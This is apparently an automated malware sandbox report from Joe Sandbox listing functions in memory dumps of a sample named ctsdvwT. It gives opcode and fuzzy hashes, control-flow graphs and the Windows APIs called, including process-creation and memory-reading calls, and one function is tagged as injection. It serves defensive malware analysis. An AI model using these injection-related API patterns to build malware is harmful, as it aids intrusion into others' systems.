                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 503fd12d2412bc1888741fc37d95014651ee0e7d7f6fc48470dcf7865debd2cf
                                        • Instruction ID: 8544985c5fbfc4e3bb550e4d470cfa7067a5562b94bbe1d8cbfa342fd2720ccd
                                        • Opcode Fuzzy Hash: 503fd12d2412bc1888741fc37d95014651ee0e7d7f6fc48470dcf7865debd2cf
                                        • Instruction Fuzzy Hash: 4CA126F221425ACFC7048F28C9925AABBF1FF82301B6A4857D806DF251DB30DD59CB91
                                        Function 07F70924 Relevance: .3, Instructions: 269COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3022ad9ef9d1afc8b2910afcde4c05eabe02eb702fc5c74a39c5d08355c8dda4
                                        • Instruction ID: 16963b97d96d84ec341e25d0d49afa7f3dd602124ad82860ee4568b4b6ccb001
                                        • Opcode Fuzzy Hash: 3022ad9ef9d1afc8b2910afcde4c05eabe02eb702fc5c74a39c5d08355c8dda4
                                        • Instruction Fuzzy Hash: DCB1F6F221425ACFC704CF28C8926A9BBF1FF86311B6A895BD805DF251D730D959CB51
                                        Function 07F70DF1 Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 008ca672bb4a6f029639927f8526a0c6fa5b7dc1a2c9a294ed4647bf5e312fe6
                                        • Instruction ID: e52f67e16ee595a9bf92f6c5ad68ae1651e82272e233887a4f81b91588255966
                                        • Opcode Fuzzy Hash: 008ca672bb4a6f029639927f8526a0c6fa5b7dc1a2c9a294ed4647bf5e312fe6
                                        • Instruction Fuzzy Hash: D7A1F4B221425ACFC7048F28C9926AABBF1FF86301B6A485BD846DF251DB30D959CB51
                                        Function 07F70AC2 Relevance: .3, Instructions: 262COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fa146c3d7e282c3676e3f63ad57e7a7d039c5193388397a24404a0298ba01d7
                                        • Instruction ID: 49d01c4e2fc2df54c3fe4e96ab3bbea1c8362021c7d726c9824e075e97e4a43f
                                        • Opcode Fuzzy Hash: 2fa146c3d7e282c3676e3f63ad57e7a7d039c5193388397a24404a0298ba01d7
                                        • Instruction Fuzzy Hash: 17A114F221425ACFC704CF28C8925AABBF1FF82310B6A8857D842DF252DB31D959CB51
                                        Function 07F70D0D Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0e9d9b81cb685098b58f1cc0d14526c8facbc079e70b26e2bc5b80a44d4ba91
                                        • Instruction ID: 7b8b9713fe4ddf5d9aa158a1a421c9247b256fad8b39699d6c508f141a28943c
                                        • Opcode Fuzzy Hash: e0e9d9b81cb685098b58f1cc0d14526c8facbc079e70b26e2bc5b80a44d4ba91
                                        • Instruction Fuzzy Hash: 70A126F221425ACFC7048F28C8926AABBF5FF82301B6A8857D805DF252DB31DD59CB51
                                        Function 07F70E4E Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43d991618795e480747b23de155d23da63857afa212e76099a0c07fe895ef1c5
                                        • Instruction ID: cc2dd9f7139fa3b9be9988a12ae3b189ded664b3d684076169b6f2b3e1a7eec5
                                        • Opcode Fuzzy Hash: 43d991618795e480747b23de155d23da63857afa212e76099a0c07fe895ef1c5
                                        • Instruction Fuzzy Hash: CBA106F221425ACFC7048F28C9926AABBF5FF82301B6A8857D845DF251DB30DD59CB51
                                        Function 07F709DD Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f34a3bb823044dd48d40083a0116ad0191cb0caaef23d8a20544f36eb679620
                                        • Instruction ID: ad047b6bd6d40ef88d63d100ca62f5e9129c6d1b0e268891c55494f59bb43ff4
                                        • Opcode Fuzzy Hash: 8f34a3bb823044dd48d40083a0116ad0191cb0caaef23d8a20544f36eb679620
                                        • Instruction Fuzzy Hash: 12A126F221425ACFC704CF28C8926AABBF1FF82311B6A8857D841DF252DB30D959CB51
                                        Function 07F70CBB Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 840005bf4fe26531f76cf8a85c2e23a63f2f41caa33131e6cc2e6c7fa4962fd3
                                        • Instruction ID: 99535a875c7af1e8d23c9147b1f02fe8d9ff9dc632c72cf8487a7f7486d981cc
                                        • Opcode Fuzzy Hash: 840005bf4fe26531f76cf8a85c2e23a63f2f41caa33131e6cc2e6c7fa4962fd3
                                        • Instruction Fuzzy Hash: D6A104F221425ACFC7048F28C8925AABBF1FF82311B6A885BD846DF251DB31DD59CB51
                                        Function 07F70D57 Relevance: .3, Instructions: 256COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06256f9a60ff2f0f743de13591d2919f62edff0ca7bf67f6bda6848ca70a620a
                                        • Instruction ID: 20b63e76d26b39a7807fb11e7fd9a766b06c8c5aca392aa1f8428076f5529ccd
                                        • Opcode Fuzzy Hash: 06256f9a60ff2f0f743de13591d2919f62edff0ca7bf67f6bda6848ca70a620a
                                        • Instruction Fuzzy Hash: 74A106F221425ACFC7048F28C89266ABBF5FF82311B6A8857D845DF251DB30DD59CB91
                                        Function 07F71060 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 965112a833d04ae1523c92ff703cd7a5ac0a0cc39cb50be720db3ffcf691ac45
                                        • Instruction ID: 5491016ed5e1fefd53e6151c7c2e0b21d979c2e9bb54361f238002fdbb246036
                                        • Opcode Fuzzy Hash: 965112a833d04ae1523c92ff703cd7a5ac0a0cc39cb50be720db3ffcf691ac45
                                        • Instruction Fuzzy Hash: DF61BFF222814DCFC704CF28C9914297BB6BBC6301B5A8467D806EF255D735ED49CB55
                                        Function 07F77F18 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9faec4ca8cb96a39625f21cca7289fa99421b4066a6b984d40de3dcbfd660400
                                        • Instruction ID: 37f0e2b68828f1b608519d539f209b087f22aceaca4a7aadf632da9cd5d922e1
                                        • Opcode Fuzzy Hash: 9faec4ca8cb96a39625f21cca7289fa99421b4066a6b984d40de3dcbfd660400
                                        • Instruction Fuzzy Hash: C341B672A24219DBC744EFA8C9419EEFBB6EF89210F18446BE515EB250C632DD41CBE1
                                        Function 07F77F28 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7609a36f423b867a2a97c1dcd399f26ed527e768d1a5da7773e63c177e81f96
                                        • Instruction ID: 8124a28901c276771e03fa7a7afea329075f41fe997c34832a0e8487f9f30dde
                                        • Opcode Fuzzy Hash: b7609a36f423b867a2a97c1dcd399f26ed527e768d1a5da7773e63c177e81f96
                                        • Instruction Fuzzy Hash: AA419676A24219DBCB04EFA8CA408EEFBB6EF89310F244467E519EB250D631DD41CBD1
                                        Function 07F7C228 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18590407f262d46aac3f2a5bc11e6460259d7f1014cf52dc0712df69315472cc
                                        • Instruction ID: 50144a8399c52befcc82c7f18de73588c5421598ecd7deab383c29e05d912727
                                        • Opcode Fuzzy Hash: 18590407f262d46aac3f2a5bc11e6460259d7f1014cf52dc0712df69315472cc
                                        • Instruction Fuzzy Hash: 5B3197B1D186188BDB18CFABD8453EEBEFBAF89300F18D02AD419A6254DB754546CF50
                                        Function 014DD429 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 395 14dd429-14dd4c7 GetCurrentProcess 400 14dd4c9-14dd4cf 395->400 401 14dd4d0-14dd504 GetCurrentThread 395->401 400->401 402 14dd50d-14dd541 GetCurrentProcess 401->402 403 14dd506-14dd50c 401->403 405 14dd54a-14dd565 call 14dd608 402->405 406 14dd543-14dd549 402->406 403->402 409 14dd56b-14dd59a GetCurrentThreadId 405->409 406->405 410 14dd59c-14dd5a2 409->410 411 14dd5a3-14dd605 409->411 410->411
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 014DD4B6
                                        • GetCurrentThread.KERNEL32 ref: 014DD4F3
                                        • GetCurrentProcess.KERNEL32 ref: 014DD530
                                        • GetCurrentThreadId.KERNEL32 ref: 014DD589
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 2245032155d93eddbb60cebc8c430598370d78c869171906da4ab2b3476c622f
                                        • Instruction ID: 890ea79d6a4eb614edef9fc41523ecf5f4c7128cc0113c0047ee01fb2aa8cea6
                                        • Opcode Fuzzy Hash: 2245032155d93eddbb60cebc8c430598370d78c869171906da4ab2b3476c622f
                                        • Instruction Fuzzy Hash: 415146B0900349DFDB18DFAAD548BAEBBF5EF48304F20845AD519A72A0D738A944CB65
                                        Function 014DD438 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 418 14dd438-14dd4c7 GetCurrentProcess 422 14dd4c9-14dd4cf 418->422 423 14dd4d0-14dd504 GetCurrentThread 418->423 422->423 424 14dd50d-14dd541 GetCurrentProcess 423->424 425 14dd506-14dd50c 423->425 427 14dd54a-14dd565 call 14dd608 424->427 428 14dd543-14dd549 424->428 425->424 431 14dd56b-14dd59a GetCurrentThreadId 427->431 428->427 432 14dd59c-14dd5a2 431->432 433 14dd5a3-14dd605 431->433 432->433
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 014DD4B6
                                        • GetCurrentThread.KERNEL32 ref: 014DD4F3
                                        • GetCurrentProcess.KERNEL32 ref: 014DD530
                                        • GetCurrentThreadId.KERNEL32 ref: 014DD589
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: fee6c7e288c54bbe17ea76e204610d0c6f9f0cafd1fbef8d7c7a560f7509eef0
                                        • Instruction ID: 7db29dfb0aa09d40cdf4eaf65914e1e19e64ccf84e5de23f5daccc7cc07a65ea
                                        • Opcode Fuzzy Hash: fee6c7e288c54bbe17ea76e204610d0c6f9f0cafd1fbef8d7c7a560f7509eef0
                                        • Instruction Fuzzy Hash: AE5136B0900309CFDB58DFAAD548BAEBBF5EF48304F20845AD519B73A0D738A944CB65
                                        Function 07F73F41 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 769 7f73f41-7f73f49 771 7f73f4c 769->771 772 7f73f51-7f73f66 771->772 773 7f74130-7f74137 772->773 774 7f73f6c 772->774 774->771 774->773 775 7f74062-7f74065 774->775 776 7f73f7c-7f73fcd 774->776 777 7f7409b-7f74111 774->777 778 7f73f7b 774->778 815 7f74068 call 7f76448 775->815 816 7f74068 call 7f76438 775->816 792 7f73fe5-7f74037 776->792 793 7f73fcf-7f73fd5 776->793 826 7f74113 call 7f78c61 777->826 827 7f74113 call 7f78c78 777->827 778->776 780 7f7406e-7f74075 817 7f7407a call 7f78120 780->817 818 7f7407a call 7f77260 780->818 819 7f7407a call 7f772ac 780->819 820 7f7407a call 7f7728c 780->820 821 7f7407a call 7f7726c 780->821 822 7f7407a call 7f78169 780->822 823 7f7407a call 7f780d8 780->823 824 7f7407a call 7f77f28 780->824 825 7f7407a call 7f77f18 780->825 784 7f74080 810 7f74082 call 7f782b1 784->810 811 7f74082 call 7f772f0 784->811 812 7f74082 call 7f7877b 784->812 813 7f74082 call 7f782ba 784->813 814 7f74082 call 7f78788 784->814 787 7f74088-7f74096 787->772 806 7f7404f-7f7405d 792->806 807 7f74039-7f7403f 792->807 794 7f73fd7 793->794 795 7f73fd9-7f73fdb 793->795 794->792 795->792 802 7f74119 804 7f74120-7f7412b 802->804 804->772 806->772 808 7f74043-7f74045 807->808 809 7f74041 807->809 808->806 809->806 810->787 811->787 812->787 813->787 814->787 815->780 816->780 817->784 818->784 819->784 820->784 821->784 822->784 823->784 824->784 825->784 826->802 827->802
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 95b922345ae96a8743979431d061f5ab72913533841fb56bc88a4a4355789a1f
                                        • Instruction ID: 541de3788bbda2876bda5e975985a73580f63f39db18778f8fb184d56d79deeb
                                        • Opcode Fuzzy Hash: 95b922345ae96a8743979431d061f5ab72913533841fb56bc88a4a4355789a1f
                                        • Instruction Fuzzy Hash: 88516074B402049FDB089F75D965BAE7AF3BF88700F24846AE9069B3A4DE75DC01CB51
                                        Function 07F73F7B Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 828 7f73f7b 829 7f73f7c-7f73fcd 828->829 835 7f73fe5-7f74037 829->835 836 7f73fcf-7f73fd5 829->836 844 7f7404f-7f7405d 835->844 845 7f74039-7f7403f 835->845 837 7f73fd7 836->837 838 7f73fd9-7f73fdb 836->838 837->835 838->835 848 7f73f51-7f73f66 844->848 846 7f74043-7f74045 845->846 847 7f74041 845->847 846->844 847->844 849 7f74130-7f74137 848->849 850 7f73f6c 848->850 850->828 850->829 850->849 851 7f74062-7f74065 850->851 852 7f73f4c 850->852 853 7f7409b-7f740db 850->853 874 7f74068 call 7f76448 851->874 875 7f74068 call 7f76438 851->875 852->848 861 7f740e5-7f740f3 853->861 855 7f7406e-7f74075 876 7f7407a call 7f78120 855->876 877 7f7407a call 7f77260 855->877 878 7f7407a call 7f772ac 855->878 879 7f7407a call 7f7728c 855->879 880 7f7407a call 7f7726c 855->880 881 7f7407a call 7f78169 855->881 882 7f7407a call 7f780d8 855->882 883 7f7407a call 7f77f28 855->883 884 7f7407a call 7f77f18 855->884 857 7f74080 869 7f74082 call 7f782b1 857->869 870 7f74082 call 7f772f0 857->870 871 7f74082 call 7f7877b 857->871 872 7f74082 call 7f782ba 857->872 873 7f74082 call 7f78788 857->873 859 7f74088-7f74096 859->848 862 7f740f9-7f74108 861->862 864 7f74111 862->864 867 7f74113 call 7f78c61 864->867 868 7f74113 call 7f78c78 864->868 865 7f74119 866 7f74120-7f7412b 865->866 866->848 867->865 868->865 869->859 870->859 871->859 872->859 873->859 874->855 875->855 876->857 877->857 878->857 879->857 880->857 881->857 882->857 883->857 884->857
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 4ee9d0dea41d2983345ab4895cee8ae900aa34b83eeecdb006afe836e624eb47
                                        • Instruction ID: 77f17f6dbcb2d99f7ee4c34ab78a72e1bd194edfddaea8be94e4ac53e4f8e876
                                        • Opcode Fuzzy Hash: 4ee9d0dea41d2983345ab4895cee8ae900aa34b83eeecdb006afe836e624eb47
                                        • Instruction Fuzzy Hash: FA417F74B402049FDB089F75D965BAEBAB3BF88700F24846AE9069B3A4CE75DC01CB51
                                        Function 01831EB5 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 018320F6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 348333fd472aa3e69c429a251bcf6a66da394d2dbe3dee54b078803d565d59ad
                                        • Instruction ID: 0135ff5b6da948e5b94874b9c33337c67cf8c6182d4260cb7c7322237abab7c0
                                        • Opcode Fuzzy Hash: 348333fd472aa3e69c429a251bcf6a66da394d2dbe3dee54b078803d565d59ad
                                        • Instruction Fuzzy Hash: 27A16C71D00619DFEB24CF68C844BEDBBB2BF84314F1881A9E819E7250DB749A85CF91
                                        Function 01831EC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 018320F6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 72f4e597c08a6f04b554480d9f16a20089a276474af9af705b80f094ebab138b
                                        • Instruction ID: 0c24d26df5c3982c30dfc9d495a25038e2686281b4bb2378d4949a23cce9b171
                                        • Opcode Fuzzy Hash: 72f4e597c08a6f04b554480d9f16a20089a276474af9af705b80f094ebab138b
                                        • Instruction Fuzzy Hash: 56916B71D00619DFEB24CF68C844BEDBBB2BF84314F088169E819E7250DB749A85CF91
                                        Function 014DADA8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014DAFFE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a0dd96ee38de6e8b22e3ca9d1641f32256006932682ee21fc39573bdcc9a411c
                                        • Instruction ID: 69708c58e105782101b65f3adb54d5964cc91d27707162055d6e6d03a4179746
                                        • Opcode Fuzzy Hash: a0dd96ee38de6e8b22e3ca9d1641f32256006932682ee21fc39573bdcc9a411c
                                        • Instruction Fuzzy Hash: 08814470A00B058FDB24DF2AD06479ABBF1FF89214F10896ED58A97B60D735E946CB90
                                        Function 032818E5 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03281A02
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 9d2b0f186d46ede40d1597498c31b7b324e9a0eb6c91f939547768553319bad1
                                        • Instruction ID: 7dc92e50f81f9cef00097c5cbe256f472712cb599e1af5cb8fad8fa747cb0a15
                                        • Opcode Fuzzy Hash: 9d2b0f186d46ede40d1597498c31b7b324e9a0eb6c91f939547768553319bad1
                                        • Instruction Fuzzy Hash: 7451D2B1C103499FDB14DF99C884ADEBFB5FF48350F24812AE819AB250D775A986CF90
                                        Function 032818F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03281A02
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 8b39e47f2025681a12d69c782288b8364d1eddc0a6c5591e2cee2871435c44ce
                                        • Instruction ID: e2476cf027b35e4db810535a4da9d6cfaf36794c6677f05293887afd3db29543
                                        • Opcode Fuzzy Hash: 8b39e47f2025681a12d69c782288b8364d1eddc0a6c5591e2cee2871435c44ce
                                        • Instruction Fuzzy Hash: 3541C0B1D10349DFDB14DF99C884ADEFBB6BF48310F24812AE819AB250D774A985CF90
                                        Function 014D590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014D59C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ce9ecd3ec08e6981cbc1ba09408968946c2298d884e8d98d1f640741a04393be
                                        • Instruction ID: a0b48288b784e4c354648996ab198baa1c91533be2d2b3857d16f8119c8981f7
                                        • Opcode Fuzzy Hash: ce9ecd3ec08e6981cbc1ba09408968946c2298d884e8d98d1f640741a04393be
                                        • Instruction Fuzzy Hash: D341D3B1D00719CFDB24CFA9C884A9EBBF1BF49304F20806AD418AB265DB756946CF91
                                        Function 014D44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014D59C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 52d5ab542ba8ac0fdf75d9495c4511f5031d5a7b4e73265d944370c28308c3ab
                                        • Instruction ID: 6fe19f0d1cb3b4f5e38718d73a03acdada5640a916c7389412ad33f1845126dd
                                        • Opcode Fuzzy Hash: 52d5ab542ba8ac0fdf75d9495c4511f5031d5a7b4e73265d944370c28308c3ab
                                        • Instruction Fuzzy Hash: FD41D2B1C00719CBDF24DFA9C854B9EBBF5BF49304F20806AD408AB265DB756946CF91
                                        Function 03284050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 03284111
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 1f34f43bf4c214a0b7acccae63edab019c1fad9a1ba27e21fdab4317d1b5c59c
                                        • Instruction ID: f08ba97d538d19d1bcf8860cfc41db435b4a0240109630c705511ee93dc7d5bf
                                        • Opcode Fuzzy Hash: 1f34f43bf4c214a0b7acccae63edab019c1fad9a1ba27e21fdab4317d1b5c59c
                                        • Instruction Fuzzy Hash: 28413AB4A103058FDB14DF8AC448AAAFBF5FF88314F25C459D519A7361D375A841CFA0
                                        Function 01831E00 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01831DA8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a74c7de612864bc21cabe7e229b5d69e869f0fce602d9767329e3d96ad20baaa
                                        • Instruction ID: 89dbb7f170aa1621a1ee48e0341acaef417fb4dd174aaf008bfbb49cd46967c6
                                        • Opcode Fuzzy Hash: a74c7de612864bc21cabe7e229b5d69e869f0fce602d9767329e3d96ad20baaa
                                        • Instruction Fuzzy Hash: 3F316772C003498FDB24EFA9C8087EEFFF1AF99720F24841AD559A7250CB399545CBA1
                                        Function 01831C38 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
